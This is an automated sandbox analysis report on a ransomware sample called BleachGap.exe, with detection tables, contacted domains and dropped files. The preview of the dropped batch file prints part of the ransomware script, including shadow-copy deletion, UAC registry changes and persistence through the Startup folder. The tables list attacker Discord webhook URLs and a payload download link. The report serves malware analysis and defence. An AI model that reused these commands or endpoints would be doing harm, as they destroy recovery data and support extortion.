Replication Through Removable Media	Launchd	Rc.common	Process Injection12	File Deletion1	Cached Domain Credentials	Virtualization/Sandbox Evasion4	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Registry Run Keys / Startup Folder12	Masquerading1	DCSync	Process Discovery3	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Valid Accounts2	Proc Filesystem	Application Window Discovery11	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Modify Registry1	/etc/passwd and /etc/shadow	System Owner/User Discovery1	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction
Supply Chain Compromise	AppleScript	At (Windows)	At (Windows)	Virtualization/Sandbox Evasion4	Network Sniffing	Remote System Discovery1	Taint Shared Content	Local Data Staging	Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol	File Transfer Protocols			Data Encrypted for Impact
Compromise Software Dependencies and Development Tools	Windows Command Shell	Cron	Cron	Access Token Manipulation21	Input Capture	Permission Groups Discovery	Replication Through Removable Media	Remote Data Staging	Exfiltration Over Physical Medium	Mail Protocols			Service Stop
Compromise Software Supply Chain	Unix Shell	Launchd	Launchd	Process Injection12	Keylogging	Local Groups	Component Object Model and Distributed COM	Screen Capture	Exfiltration over USB	DNS			Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
BleachGap.exe	43%	Virustotal		Browse

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\1C7E.tmp\1C7F.tmp\extd.exe	19%	Metadefender		Browse
C:\Users\user\AppData\Local\Temp\1C7E.tmp\1C7F.tmp\extd.exe	41%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\AppData\Local\Temp\1C7E.tmp\DiscordSendWebhook.exe	8%	Metadefender		Browse
C:\Users\user\AppData\Local\Temp\1C7E.tmp\DiscordSendWebhook.exe	8%	ReversingLabs
C:\Users\user\AppData\Local\Temp\1C7E.tmp\aescrypt.exe	21%	Metadefender		Browse
C:\Users\user\AppData\Local\Temp\1C7E.tmp\aescrypt.exe	21%	ReversingLabs	Win32.Packed.Generic
C:\Users\user\AppData\Local\Temp\47B4.tmp\47B5.tmp\extd.exe	19%	Metadefender		Browse
C:\Users\user\AppData\Local\Temp\47B4.tmp\47B5.tmp\extd.exe	41%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\AppData\Local\Temp\47B4.tmp\DiscordSendWebhook.exe	8%	Metadefender		Browse
C:\Users\user\AppData\Local\Temp\47B4.tmp\DiscordSendWebhook.exe	8%	ReversingLabs
C:\Users\user\AppData\Local\Temp\47B4.tmp\aescrypt.exe	21%	Metadefender		Browse
C:\Users\user\AppData\Local\Temp\47B4.tmp\aescrypt.exe	21%	ReversingLabs	Win32.Packed.Generic

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
0.0.BleachGap.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1135103		Download File
17.0.BleachGap.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1135103		Download File

Domains

Source	Detection	Scanner	Link
cdn-115.anonfiles.com	1%	Virustotal	Browse
discord.com	1%	Virustotal	Browse
anonfiles.com	0%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label
https://discord.com/api/webhooks/803443573722710047/DHTqigSoy72GqbbicAGvijeiMetfkvr8QL0UVyVIb	0%	Avira URL Cloud	safe
http://pesterbdd.com/images/Pester.png	0%	URL Reputation	safe
http://pesterbdd.com/images/Pester.png	0%	URL Reputation	safe
http://pesterbdd.com/images/Pester.png	0%	URL Reputation	safe
http://pesterbdd.com/images/Pester.png	0%	URL Reputation	safe
https://cdn-115.anonfiles.com/9821W1G5p3/542b7e19-1612884386/gameover.exe	0%	Avira URL Cloud	safe
http://www.Phoenix125.comX	0%	Avira URL Cloud	safe
http://www.phoenix125.com/DiscordAvatar.jpg	0%	Avira URL Cloud	safe
https://discord.com/api/webhooks/807704589436452915/jhcjthfZ4SBzzZNBbqZ9xII5kv9CycOOacxLmktf6BQQn-FY	0%	Avira URL Cloud	safe
https://contoso.com/	0%	URL Reputation	safe
https://contoso.com/	0%	URL Reputation	safe
https://contoso.com/	0%	URL Reputation	safe
https://contoso.com/License	0%	URL Reputation	safe
https://contoso.com/License	0%	URL Reputation	safe
https://contoso.com/License	0%	URL Reputation	safe
https://contoso.com/Icon	0%	URL Reputation	safe
https://contoso.com/Icon	0%	URL Reputation	safe
https://contoso.com/Icon	0%	URL Reputation	safe
https://discord.com/api/webhooks/803443573722710047/DHTqigSoy72GqbbicAGvijeiMetfkvr8QL0UVyVIbp-4tehV	0%	Avira URL Cloud	safe
http://Webhook1URL.com	0%	Avira URL Cloud	safe
http://Webhook2URL.com	0%	Avira URL Cloud	safe
http://www.Phoenix125.comD	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
cdn-115.anonfiles.com	217.64.149.38	true	false	1%, Virustotal, Browse	unknown
discord.com	162.159.135.232	true	false	1%, Virustotal, Browse	unknown
anonfiles.com	104.21.44.138	true	false	0%, Virustotal, Browse	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://nuget.org/NuGet.exe	powershell.exe, 00000025.00000002.302217287.0000028CC0547000.00000004.00000001.sdmp	false		high
https://github.com/phoenix125	DiscordSendWebhook.exe, 00000022.00000002.250772116.0000000000BFD000.00000004.00000001.sdmp, DiscordSendWebhook.exe, 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp, DiscordSendWebhook.exe.0.dr	false		high
https://discord.com/api/webhooks/803443573722710047/DHTqigSoy72GqbbicAGvijeiMetfkvr8QL0UVyVIb	powershell.exe, 00000025.00000003.283359368.0000028CC8801000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000025.00000003.283107917.0000028CC8740000.00000004.00000001.sdmp, powershell.exe, 00000025.00000002.293430267.0000028CB05B1000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://cdn-115.anonfiles.com/9821W1G5p3/542b7e19-1612884386/gameover.exe	1C80.bat.0.dr	false	Avira URL Cloud: safe	unknown
http://www.Phoenix125.comX	DiscordSendWebhook.exe, 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp, DiscordSendWebhook.exe.0.dr	false	Avira URL Cloud: safe	unknown
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000025.00000003.283107917.0000028CC8740000.00000004.00000001.sdmp, powershell.exe, 00000025.00000002.293430267.0000028CB05B1000.00000004.00000001.sdmp	false		high
http://www.phoenix125.com/DiscordAvatar.jpg	DiscordSendWebhook.exe, 00000022.00000002.250772116.0000000000BFD000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://discord.com/api/webhooks/807704589436452915/jhcjthfZ4SBzzZNBbqZ9xII5kv9CycOOacxLmktf6BQQn-FY	1C80.bat.0.dr	false	Avira URL Cloud: safe	unknown
https://contoso.com/	powershell.exe, 00000025.00000002.302217287.0000028CC0547000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://nuget.org/nuget.exe	powershell.exe, 00000025.00000002.302217287.0000028CC0547000.00000004.00000001.sdmp	false		high
https://contoso.com/License	powershell.exe, 00000025.00000002.302217287.0000028CC0547000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://contoso.com/Icon	powershell.exe, 00000025.00000002.302217287.0000028CC0547000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://discord.com/api/webhooks/803443573722710047/DHTqigSoy72GqbbicAGvijeiMetfkvr8QL0UVyVIbp-4tehV	powershell.exe, 00000025.00000002.292313796.0000028CAE952000.00000004.00000020.sdmp, 1C80.bat.0.dr	false	Avira URL Cloud: safe	unknown
http://Webhook1URL.com	DiscordSendWebhook.exe, 00000022.00000002.250772116.0000000000BFD000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://discordapp.com/api/webhooks/123456789012345678/abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRS	DiscordSendWebhook.exe, 00000022.00000002.250772116.0000000000BFD000.00000004.00000001.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000025.00000002.293047197.0000028CB03A1000.00000004.00000001.sdmp	false		high
https://github.com/Pester/Pester	powershell.exe, 00000025.00000003.283107917.0000028CC8740000.00000004.00000001.sdmp, powershell.exe, 00000025.00000002.293430267.0000028CB05B1000.00000004.00000001.sdmp	false		high
http://Webhook2URL.com	DiscordSendWebhook.exe, 00000022.00000002.250772116.0000000000BFD000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.Phoenix125.comD	DiscordSendWebhook.exe, 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp, DiscordSendWebhook.exe.0.dr	false	Avira URL Cloud: safe	unknown
https://discordapp.com/api/webhooks/987654321098765432/6543210987654321ZYXWVUTSRQPONMLKJIHGFEDCBAzyx	DiscordSendWebhook.exe, 00000022.00000002.250772116.0000000000BFD000.00000004.00000001.sdmp	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
162.159.135.232	unknown	United States		13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox Version:	31.0.0 Emerald
Analysis ID:	352865
Start date:	15.02.2021
Start time:	00:27:10
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 10m 29s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	BleachGap.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	40
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.rans.adwa.evad.winEXE@812/25@8/1
EGA Information:	Failed
HDC Information:	Successful, ratio: 99.7% (good quality ratio 94.3%) Quality average: 86.9% Quality standard deviation: 26.1%
HCA Information:	Successful, ratio: 56% Number of executed functions: 120 Number of non-executed functions: 306
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe
Warnings:	Show All Exclude process from analysis (whitelisted): taskhostw.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, VSSVC.exe, svchost.exe Excluded IPs from analysis (whitelisted): 52.255.188.83, 13.64.90.137, 51.104.139.180, 23.218.208.56, 92.122.213.194, 92.122.213.247, 8.253.207.120, 8.253.204.121, 67.26.139.254, 8.248.121.254, 67.26.73.254, 52.155.217.156, 20.54.26.129 Excluded domains from analysis (whitelisted): displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, skypedataprdcolwus17.cloudapp.net, arc.msn.com.nsatc.net, fs.microsoft.com, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, blobcollector.events.data.trafficmanager.net, audownload.windowsupdate.nsatc.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, auto.au.download.windowsupdate.com.c.footprint.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net Report size exceeded maximum capacity and may have missing behavior information. Report size exceeded maximum capacity and may have missing disassembly code. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtQueryValueKey calls found. Report size getting too big, too many NtSetInformationFile calls found. Report size getting too big, too many NtWriteVirtualMemory calls found.

Simulations

Behavior and APIs

Time	Type	Description
00:27:56	API Interceptor	2x Sleep call for process: WMIC.exe modified
00:27:57	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BleachGap.exe
00:28:19	API Interceptor	2x Sleep call for process: DiscordSendWebhook.exe modified
00:28:34	API Interceptor	31x Sleep call for process: powershell.exe modified
00:28:51	Task Scheduler	Run new task: UpdateWuaucltHelper path: C:\Users\user\AppData\Local\Temp\final.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link
162.159.135.232	Chrome.exe	Get hash	malicious	Browse
	UaTCQiQ6XK.exe	Get hash	malicious	Browse
	0000098.xlsx	Get hash	malicious	Browse
	988119028872673623l.exe	Get hash	malicious	Browse
	SecuriteInfo.com.Fareit-FZO54A4BE7037EC.exe	Get hash	malicious	Browse
	5Z6D2lAQBQ.exe	Get hash	malicious	Browse
	Pago Fecha 2021.xls	Get hash	malicious	Browse
	Doc00118871655141998.exe	Get hash	malicious	Browse
	SecuriteInfo.com.Trojan.InjectNET.14.10717.exe	Get hash	malicious	Browse
	Payment_details.exe	Get hash	malicious	Browse
	DQu38121jV.exe	Get hash	malicious	Browse
	SJa7s8Fd2g.exe	Get hash	malicious	Browse
	0939489392303224233.exe	Get hash	malicious	Browse
	ELvNtSKy30.exe	Get hash	malicious	Browse
	n41pVXkYCe.exe	Get hash	malicious	Browse
	Q-20E122269-USD INQUIRY NO.201200019_DOC .EXE	Get hash	malicious	Browse
	cap.exe	Get hash	malicious	Browse
	2817299128.pdf.exe	Get hash	malicious	Browse
	PL_BL_SMK14122020.exe	Get hash	malicious	Browse
	U0N4EBAJKJ.exe	Get hash	malicious	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
discord.com	2.exe	Get hash	malicious	Browse	162.159.137.232
	558d9db9309b918e.exe	Get hash	malicious	Browse	162.159.137.232
	SuperEnjoy.exe	Get hash	malicious	Browse	162.159.128.233
	InfoSender.exe	Get hash	malicious	Browse	162.159.136.232
	Dropper.xlsm	Get hash	malicious	Browse	162.159.138.232
	Chrome.exe	Get hash	malicious	Browse	162.159.135.232
	Matrix.exe	Get hash	malicious	Browse	162.159.138.232
	0939489392303224233.exe	Get hash	malicious	Browse	162.159.128.233
	b12d7feb3507461a.exe	Get hash	malicious	Browse	162.159.138.232
	SecuriteInfo.com.Trojan.DownLoader36.32796.17922.exe	Get hash	malicious	Browse	162.159.137.232
	Og8qU1smzy.exe	Get hash	malicious	Browse	162.159.138.232
	0p8ufnbnaG.exe	Get hash	malicious	Browse	162.159.128.233
	0p8ufnbnaG.exe	Get hash	malicious	Browse	162.159.137.232
	UaTCQiQ6XK.exe	Get hash	malicious	Browse	162.159.135.232
	0000098.xlsx	Get hash	malicious	Browse	162.159.135.232
	DRAFT-KMBT-F33C6592-96F3-4015-8107_IMG.exe	Get hash	malicious	Browse	162.159.136.232
	December SOA.exe	Get hash	malicious	Browse	162.159.137.232
	988119028872673623l.exe	Get hash	malicious	Browse	162.159.136.232
	SecuriteInfo.com.Fareit-FZO54A4BE7037EC.exe	Get hash	malicious	Browse	162.159.135.232
	xs1ALnpMCT.exe	Get hash	malicious	Browse	162.159.128.233
anonfiles.com	inrfzFzDHR.exe	Get hash	malicious	Browse	45.148.16.42
	AdviceSlip.xls	Get hash	malicious	Browse	217.64.149.169
	https://anonfiles.com/5ew1X5w8p0/Complete_Infiltrating_Lebanon_rar	Get hash	malicious	Browse	104.31.79.173
	https://cdn-102.anonfiles.com/74S7h0zcpf/89a5d721-1608220696/Red%20Engine%20Cracked.zip	Get hash	malicious	Browse	217.64.149.161
	https://anonfiles.com/74S7h0zcpf/Red_Engine_Cracked_zip	Get hash	malicious	Browse	104.31.79.173
	b46rhYLlgB.exe	Get hash	malicious	Browse	45.148.16.42
	INQUIRY ORDER.doc	Get hash	malicious	Browse	194.32.146.99
	INQUIRY ORDER.doc	Get hash	malicious	Browse	194.32.146.99
	INQUIRY ORDER.doc	Get hash	malicious	Browse	194.32.146.99
	https://cdn-34.anonfiles.com/J57b98L9o5/7860f6e3-1602497583/%D8%AA%D8%B7%D8%A8%D9%8A%D9%82%20%D8%A7%D9%84%D9%87%D8%AC%D8%A7%D8%A1%20%D9%84%D9%87%D8%A7%D8%AA%D9%81%20%D8%A7%D9%84%D8%A7%D9%94%D9%86%D8%AF%D8%B1%D9%88%D9%8A%D8%AF.apk	Get hash	malicious	Browse	172.64.138.6
	Estado_de_Cargamentos_811012912_Impo_2020-10-05_28.exe	Get hash	malicious	Browse	45.148.16.42
	SecuriteInfo.com.Variant.Bulz.82555.20565.exe	Get hash	malicious	Browse	45.148.16.42
	StormKitty-1.exe	Get hash	malicious	Browse	45.148.16.42

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
CLOUDFLARENETUS	Attachment.exe	Get hash	malicious	Browse	162.159.129.233
	Uninstall.exe	Get hash	malicious	Browse	1.1.1.1
	SecuriteInfo.com.Trojan.Siggen11.11008.27532.exe	Get hash	malicious	Browse	104.23.98.190
	ProtectedAdviceSlip.xls	Get hash	malicious	Browse	104.22.0.232
	ERRoqGpsIS.dll	Get hash	malicious	Browse	104.21.45.75
	notice of arrival.xlsx	Get hash	malicious	Browse	172.67.8.238
	LSuDNrw50J.exe	Get hash	malicious	Browse	104.21.19.200
	3aVBS43Xc2.exe	Get hash	malicious	Browse	172.67.193.215
	lumJSEHnFa.exe	Get hash	malicious	Browse	172.67.184.253
	A6Qom7We0l.exe	Get hash	malicious	Browse	104.21.59.243
	aUWqpYqmXT.exe	Get hash	malicious	Browse	104.21.61.164
	BHuuI8LETf.exe	Get hash	malicious	Browse	104.21.59.243
	m1hholPLan.exe	Get hash	malicious	Browse	104.21.59.243
	nyDyMJGKWD.exe	Get hash	malicious	Browse	104.21.59.243
	SX35.vbs	Get hash	malicious	Browse	104.21.234.56
	QQ56.vbs	Get hash	malicious	Browse	104.21.234.56
	UX74.vbs	Get hash	malicious	Browse	104.21.234.56
	EG45.vbs	Get hash	malicious	Browse	104.21.234.57
	MusicConverter.exe	Get hash	malicious	Browse	172.67.160.132
	SecuriteInfo.com.Gen.NN.ZevbaF.34804.fm0@aOq6Z7ci.exe	Get hash	malicious	Browse	104.21.45.117

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
ce5f3254611a8c095a3d821d44539877	A6Qom7We0l.exe	Get hash	malicious	Browse	162.159.135.232
	BHuuI8LETf.exe	Get hash	malicious	Browse	162.159.135.232
	m1hholPLan.exe	Get hash	malicious	Browse	162.159.135.232
	nyDyMJGKWD.exe	Get hash	malicious	Browse	162.159.135.232
	SecuriteInfo.com.Trojan.PWS.Siggen2.61222.12968.exe	Get hash	malicious	Browse	162.159.135.232
	ZRz0Aq1Rf0.dll	Get hash	malicious	Browse	162.159.135.232
	QpXze5wxqM.exe	Get hash	malicious	Browse	162.159.135.232
	fmSEWxVZ1A.exe	Get hash	malicious	Browse	162.159.135.232
	CeDOD6gY5R.exe	Get hash	malicious	Browse	162.159.135.232
	HA2a7FagC6.exe	Get hash	malicious	Browse	162.159.135.232
	MakYpSHZKE.exe	Get hash	malicious	Browse	162.159.135.232
	lGJz5igIpb.exe	Get hash	malicious	Browse	162.159.135.232
	hlJKdqGhdI.exe	Get hash	malicious	Browse	162.159.135.232
	ePw8FY78DE.exe	Get hash	malicious	Browse	162.159.135.232
	nOXqwUFtwD.exe	Get hash	malicious	Browse	162.159.135.232
	wegUf0EGA0.exe	Get hash	malicious	Browse	162.159.135.232
	SCD10093264.jpg.exe	Get hash	malicious	Browse	162.159.135.232
	SCD10093264.jpg.exe	Get hash	malicious	Browse	162.159.135.232
	QgWarCS5Z4.exe	Get hash	malicious	Browse	162.159.135.232
	0zwHgf4MZ6.exe	Get hash	malicious	Browse	162.159.135.232

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Link
C:\Users\user\AppData\Local\Temp\47B4.tmp\DiscordSendWebhook.exe	SuperEnjoy.exe	Get hash	malicious	Browse
	InfoSender.exe	Get hash	malicious	Browse
C:\Users\user\AppData\Local\Temp\1C7E.tmp\DiscordSendWebhook.exe	SuperEnjoy.exe	Get hash	malicious	Browse
	InfoSender.exe	Get hash	malicious	Browse
C:\Users\user\AppData\Local\Temp\47B4.tmp\aescrypt.exe	SuperEnjoy.exe	Get hash	malicious	Browse
C:\Users\user\AppData\Local\Temp\1C7E.tmp\aescrypt.exe	SuperEnjoy.exe	Get hash	malicious	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	0.9260988789684415
Encrypted:	false
SSDEEP:	3:Nlllulb/lj:NllUb/l
MD5:	13AF6BE1CB30E2FB779EA728EE0A6D67
SHA1:	F33581AC2C60B1F02C978D14DC220DCE57CC9562
SHA-256:	168561FB18F8EBA8043FA9FC4B8A95B628F2CF5584E5A3B96C9EBAF6DD740E3F
SHA-512:	1159E1087BC7F7CBB233540B61F1BDECB161FF6C65AD1EFC9911E87B8E4B2E5F8C2AF56D67B33BC1F6836106D3FEA8C750CC24B9F451ACF85661E0715B829413
Malicious:	false
Preview:	@...e................................................@..........

C:\Users\user\AppData\Local\Temp\1C7E.tmp\1C7F.tmp\1C80.bat Download File
Process:	C:\Users\user\Desktop\BleachGap.exe
File Type:	ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	7154
Entropy (8bit):	5.593322561212984
Encrypted:	false
SSDEEP:	96:sJKc4m7wRQZJHgwamXkzaEF7cEFg93sLIBKA0mFm+mR7rEa7V0rHLp9OG:sJUQZV9kaEFQEFgis07J0PD
MD5:	448D1564F501C6948E873F7EC3348BE7
SHA1:	91DCD677C0CEB210E9FED2383805CC003D8CB286
SHA-256:	086E8E58F2E6FACCB9442DC4055DB2187177A37CDCF8656CA8780BB1EFAD19D8
SHA-512:	C77F0807EE0DFBEAF69B636CD4BF2264694C1152B309986C44DBFF018442E9FA85ABEB8378FFA1A93F836FC701CF70A32AF720D5AC720E53EE3306F1BFF7A9A5
Malicious:	true
Yara Hits:	Rule: JoeSecurity_BatToExe, Description: Yara detected BatToExe compiled binary, Source: C:\Users\user\AppData\Local\Temp\1C7E.tmp\1C7F.tmp\1C80.bat, Author: Joe Security Rule: JoeSecurity_Ransomware_Generic, Description: Yara detected Ransomware_Generic, Source: C:\Users\user\AppData\Local\Temp\1C7E.tmp\1C7F.tmp\1C80.bat, Author: Joe Security
Preview:	@shift /0..@set b2eextd=C:\Users\user\AppData\Local\Temp\1C7E.tmp\1C7F.tmp\extd.exe..@set extd=@call:extd..@set b2etempfile=C:\Users\user\AppData\Local\Temp\1C7E.tmp\1C7F.tmp\1C81.tmp..@echo off..:: BAT/Ransom.BleachGap..:: In five minutes you'll already be crying, after 10 mins you'll trying to drink bleach...setlocal enableextensions enabledelayedexpansion..cd /D %tmp%..copy /b /y %0 "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup"..wmic shadowcopy delete..vssadmin delete shadows /all /quiet..REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "PromptOnSecureDesktop" /t REG_DWORD /d "0" /f..REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "ConsentPromptBehaviorAdmin" /t REG_DWORD /d "0" /f..REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t REG_DWORD /d "1" /f..REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Keyboard Layout" /v "Scancode Map" /t REG_BINARY /d "000000000000000017000000

C:\Users\user\AppData\Local\Temp\1C7E.tmp\1C7F.tmp\extd.exe Download File
Process:	C:\Users\user\Desktop\BleachGap.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows, UPX compressed
Category:	dropped
Size (bytes):	264704
Entropy (8bit):	7.995874752462146
Encrypted:	true
SSDEEP:	6144:hxLU+6NdGddlftqxiqx0gwvnGvxvFouHK6yoS:hO+UGdvEpx0fevx+uHSoS
MD5:	38CE85E4580071C40BB204EDFB85A303
SHA1:	EBA80056F4A15FA131478532483B8ABE050C6999
SHA-256:	F0FFDDCF4B507A617D6883889F5167CC6C2D27015EF63AD3E014DB314CD8F465
SHA-512:	0A310A94A418926524E16C15186BA89797B52CDF1EBCDD4F59B79C3963AFDF07EA8EA8E58B23D5126590F3FF0BD2902A6F66D9B05E4B5B481331A97D0B6956FA
Malicious:	true
Antivirus:	Antivirus: Metadefender, Detection: 19%, Browse Antivirus: ReversingLabs, Detection: 41%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....?SZ...............2......... .. &...0...@....@..........................P...............................................B..8....@..............................................................................................................UPX0..... ..............................UPX1.........0......................@....rsrc........@......................@...3.94.UPX!......^G.K6nN...........&......4.@.O7./..{...qa..+ ....r..JTB...~..W..j..D...HFdM.D...C:....,.....w. ..;!.....t..!C9..<..Y..,n.uq...C..r/.{..H.!.`.`.V~._.Q..i....$S.._.[p..,Cp..t:....G..V3.].x.5..P..,.......1..\.........r~.ozz....a.B..X.c..1.Qj..`h\p..A.......^..b..M......=........Xf.-....H.N.".....T....z....H..I .-...h&P..U.'}..{~R.......F.W.v....-.OC.....g#..}...f...._.@.9....C....M8\|S..f..6v.@...i.d(i..H.../7.Yw.. G.y.M....].?.Yb_.....@Y._+Z.5.......\..j3cD......2...

C:\Users\user\AppData\Local\Temp\1C7E.tmp\DiscordSendWebhook.exe Download File
Process:	C:\Users\user\Desktop\BleachGap.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	988672
Entropy (8bit):	6.870063375918261
Encrypted:	false
SSDEEP:	24576:WAHnh+eWsN3skA4RV1Hom2KXMmHaWbK76Zu5:xh+ZkldoPK8YaWG+6
MD5:	FB7A78F485EC2586C54D60D293DD5352
SHA1:	D4E1F1061F7A872F9843E44C7D27D13BA7EF71BB
SHA-256:	B116FF00546620A598119D6704E9849393D2F9948FC8888D6DDF6211AA5B80B9
SHA-512:	B6635E849AB96740E5CEFEF3A874DC58CC26AA18CCC9CCA31E61E541C2DDEADE7EB59E524FC36DF22E0656884733F29D1143FFBF1CDD92FBD636D134D723C3E5
Malicious:	true
Antivirus:	Antivirus: Metadefender, Detection: 8%, Browse Antivirus: ReversingLabs, Detection: 8%
Joe Sandbox View:	Filename: SuperEnjoy.exe, Detection: malicious, Browse Filename: InfoSender.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........s..R...R...R....C..P....;.S..._@#.a..._@......_@..g...[j..[...[jo.w...R...r...........#.S..._@'.S...R.k.S....".S...RichR...................PE..L....}._.........."..........2....................@..........................p............@...@.......@.........................\|.......,n......................4q...+..............................PK..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...,n.......p...4..............@..@.reloc..4q.......r..................@..B........................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\1C7E.tmp\aescrypt.exe Download File
Process:	C:\Users\user\Desktop\BleachGap.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	144384
Entropy (8bit):	6.805779966193588
Encrypted:	false
SSDEEP:	3072:NgzEhDpHGk/gqrYxgHNEt3koN0Shi76u7:NiEhNHgqrLme+i
MD5:	82FF688AA9253B356E5D890FF311B59E
SHA1:	4A143FC08B6A55866403966918026509BEFCC7C1
SHA-256:	B68FC901D758BA9EA3A5A616ABD34D1662197AA31B502F27CBF2579A947E53E9
SHA-512:	CBB3D81E3237B856E158C5F38F84230A50F913BDADA0EF37B679E27E7DDF3C970173B68D2415DD8A7377BA543206BB8E0FE77C61334B47C5684E3DDFFF86ACED
Malicious:	true
Yara Hits:	Rule: JoeSecurity_AESCRYPTTool, Description: Yara detected AESCRYPT Tool, Source: C:\Users\user\AppData\Local\Temp\1C7E.tmp\aescrypt.exe, Author: Joe Security
Antivirus:	Antivirus: Metadefender, Detection: 21%, Browse Antivirus: ReversingLabs, Detection: 21%
Joe Sandbox View:	Filename: SuperEnjoy.exe, Detection: malicious, Browse
